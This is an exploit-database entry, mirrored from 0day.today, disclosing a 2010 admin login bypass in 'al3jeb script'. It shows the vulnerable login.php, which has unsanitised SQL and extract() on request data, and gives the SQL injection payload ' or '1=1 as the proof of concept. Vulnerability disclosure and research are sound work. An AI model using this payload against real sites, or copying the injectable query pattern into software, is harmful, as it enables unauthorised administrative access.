Lucene search
K

al3jeb script Remote Login Bypass Exploit

🗓️ 19 Jan 2010 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 252 Views

al3jeb script Remote Login Bypass Exploit (Discovered: cr4wl3r, Date: 19.01.2010, Remote: yes

Code
=========================================
al3jeb script Remote Login Bypass Exploit
=========================================

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |      al3jeb script Remote Login Bypass Exploit     |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
 
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Date: 19.01.2010
[!] Remote: yes
 
[!] Vulnerability Code [login.php] :
 
<?
session_start();
extract($_POST);
extract($_GET);
extract($_SESSION);
extract($_COOKIE);
?>
<?php
include("Connections/config.php");
if(isset($_POST['Submit']))
{
 $u=$_POST["uname"];
 $p=$_POST["pwd"];
 $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
  
if($row=mysql_fetch_array($r))
{
 $_SESSION['AdminName']=$u;
 if(isset($re))
 {
 setcookie("username",$u,time()+3600);
 }
 header("location:index.php");
  
}
}
?>
 
 
[!] PoC: [al3jebscript]/login.php
 
    username : ' or '1=1
    password : cr4wl3r



#  0day.today [2018-03-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jan 2010 00:00Current
7.1High risk
Vulners AI Score7.1
252